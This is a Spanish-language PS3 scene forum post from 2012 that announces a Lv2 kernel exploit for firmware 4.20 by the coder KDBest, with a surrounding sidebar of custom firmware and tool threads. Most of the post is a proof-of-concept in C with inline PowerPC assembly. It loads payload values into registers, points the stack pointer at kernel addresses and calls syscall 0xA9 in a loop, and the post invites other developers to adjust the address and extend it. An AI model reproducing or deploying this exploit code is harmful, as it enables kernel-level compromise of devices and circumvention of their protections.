SceneZeta

Forum-Secciones

Chicas SeX

Zrandi

Avatar

Lo que empiezo, lo termino.

Group
FUNDaDoR
Posts
12,533
Location
En algún lugar del Espacio
Status
Offline
PM Email

Friends

PS3 CFW

PSP L/CFW

PSVita ECFW Todos los Exploit

Buscamos Colaborares y Redactores

Últimos Post del Foro

Friends Posts

Last comments

  1. 6/10 17:14: JGR in CFW 4.81.1 REBUG REX / D-REX + COBRA v7.31 + Toolbox 2.02.11 By Team Rebug
  2. 27/5 2:56: Yipiuy Yipiey in AC ROGUE TOOL RTM [BLES/BLUS]
  3. 17/8 9:34: Alex Vilar in WATCH DOGS: TOOL RTM v.1.04
  4. 26/4 17:11: Zrandi in CFW​ 4.81 STARBUCKS v1.02 + COBRA 7.50 [CEX] By Habib
  5. 25/12 14:33: Azar 23 in CFW 4.81.2 REBUG REX / D-REX + COBRA v7.50 + Toolbox 2.02.12 By Team Rebug
  6. 21/6 22:45: LaloLambda1977 in DarkPS3Tools V1.10 por DarkGioby
  7. 6/5 17:31: Fede Maciel in Control Console API 2.70 v6 - RTE CEX + DEX (+Android)
  8. 14/1 1:54: diegosS in MultiMan 4.81.02 BASE/ STEALTH/ UPDATE/ CEX/DEX.
  9. 19/4 21:50: Zrandi in PSN PATCH v2017.01/A [ CFW 4.81 Y TODOS CFW ][ Developer KW ]
  10. 1/2 22:05: Zrandi in [HOMEBREW] SEN Enabler & Disabler v6.0.4 [4.81][CEX/DEX][NEW]
  11. 15/9 18:20: InFaMuS in [TUTORIAL] SEN Enabler

2 user(s) online

F_ACTIVE
2 guests
0 members
0 Anonymous Members
[ View Complete List ]
Groups legend
FUNDaDoR
MoDeRaDoR GloBaL
V.I.P
Developer
Usuario Top
Fan
Member
GaMe-OvEr

Statistics

F_STATS
LO MÁS DESTACADO DE EL FORO have:
679 articles, 2,336 comments

Most users ever online was 2,150 on 7/11/2017, 20:34

Calendar

  1. Exploit Lv2_Kernel por KDBest en Firmware 4.20

    By Zrandi il 22 Sep. 2012
     
    Like       0 Comments   43 Views
    .

    ps3exploited


    Hola amigos de la secena , como todos ya sabreis hace unos dias os comentabamos el lv2 kernel exploit 3.41 rompia con la vulneravilidad de la ps3 y Naehrwert nos lo demostro en esta noticia, asi pues tomo cartas en el asunto nuestro compañero y coder KDBest demostrandonos que es posible ejecutar el exploit lv2 kernel en firmware 4.20 y sin ninguna posivilidad en firmwares superiores con este metodo, asi pues dejamos acontinuacion la manera de desarrollarlo para otro desarrolladores lo testeen y sacarle un mayor partido, con esto nos da un buen savor de boca de un futuro CFW MAYOR A 3.55,DEMOSLES TIEMPO Y CONFIANZA, como ya saveis siempre obtenemos buenos resultados a sus proyectos.

    CODE
    //compile: ppu-gcc kds2.c -o kds2.elf
    //or: ppu-lv2-gcc kds2.c -o kds2.elf

    register unsigned long long payloadHolder2 asm ("r21");
    register unsigned long long payloadHolder asm ("r20");
    register unsigned long long stackpointer asm ("r1");
    register unsigned long long counter asm ("r25");
    register unsigned long long bufferStackpointer asm ("r26");

    int __volatile__ main(int argc, const char* argv[])
    {
    // backup Stack pointer
    bufferStackpointer = stackpointer;

    payloadHolder = 0x3960024F3960024FUL;
    payloadHolder2 = 0x4400000244000002UL;

    // Incrementer
    counter = 0x00;

    // Play with that address till the panic is executed, I lack of time todo so
    // add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
    stackpointer = 0x8000000000000100UL;
    doItAgain:
    // KDSBest Payload
    // Prepare for our Syscall

    asm("li %­r0, 0x0");
    asm("li %­r3, 0x6");
    asm("li %­r4, 0x1");
    // li r11, 0x24F -> PANIC
    asm("mr %­r22, %­r20");
    asm("mr %­r23, %­r20");
    asm("mr %­r24, %­r20");
    asm("mr %­r27, %­r20");
    asm("mr %­r28, %­r20");
    asm("mr %­r29, %­r20");
    asm("mr %­r30, %­r20");
    asm("mr %­r31, %­r20");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %­r11, 0xA9");
    asm("sc");
    counter += 0x04;

    // We write sc
    asm("mr %­r22, %­r21");
    asm("mr %­r23, %­r21");
    asm("mr %­r24, %­r21");
    asm("mr %­r27, %­r21");
    asm("mr %­r28, %­r21");
    asm("mr %­r29, %­r21");
    asm("mr %­r30, %­r21");
    asm("mr %­r31, %­r21");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %­r11, 0xA9");
    asm("sc");
    counter += 0x04;


    if(counter < 0x1000000)
    goto doItAgain;

    stackpointer = bufferStackpointer;
    return 0;
    }

      Share  
     
    .

LO MÁS DESTACADO DE EL FORO
 
Create your forum and your blog! · Top Forum · Categories · Help · Status · Contacts · Powered by ForumCommunity